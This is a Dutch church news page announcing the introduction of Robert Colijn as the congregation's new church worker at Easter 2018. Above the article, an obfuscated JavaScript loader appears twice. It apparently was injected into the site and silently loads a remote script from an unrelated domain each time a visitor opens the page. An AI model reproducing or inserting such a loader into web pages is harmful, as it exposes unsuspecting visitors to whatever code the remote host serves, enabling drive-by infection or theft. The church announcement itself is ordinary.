;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Robert Colijn aan de gemeente voorgesteld - PKN Damwâld

Robert Colijn aan de gemeente voorgesteld

Gepubliceerd op: maandag 2 april 2018

Pasen was dit jaar wel heel bijzonder. Naast het geweldige feest van de opstanding van Jezus Christus, de Paaschallenge voor jeugd, overwinning voor de levende God gevierd door de Berne Tsjerke werd vandaag de nieuwe kerkelijk werker Robert Colijn voorgesteld.

Na een introductie door ds. Boukes stelde Robert zich voor. Robert is 41 jaar en woonachtig in Leeuwarden. Robert is gelukkig getrouwd met Sannie en hebben samen een gezin met 3 eigen en 2 pleegkinderen. Daarnaast is Sannie in blijde verwachting van hun 4de kindje. Robert heeft 20 jaar voor Youth for Christ gewerkt waarbij hij op verschillende wijze actief was als jongerenwerker. Met zijn ervaring hoopt hij binnen onze gemeente als kerkelijk werker een bijdrage te leveren aan een opbouwende en levendige gemeente. Vanaf 1 april bij ons in dienst. De komende maanden zal hij mee gaan kijken, zodat hij een goed beeld krijgt van de gemeente en daaruit een plan van aanpak maken. Binnenkort zal in een speciale dienst zijn ambt aanvaarding plaatst vinden.

Net als dominee Boukes kreeg Robert ook van de Berne Tsjerke een “overwinnings” T-shirt aangeboden. Anders dan bij Boukes was de pasvorm iets te klein. Of had de Berne Tsjerke hier al een bedoeling mee?!

Tijdens het koffie drinken was mogelijkheid om nader kennis met hem te maken.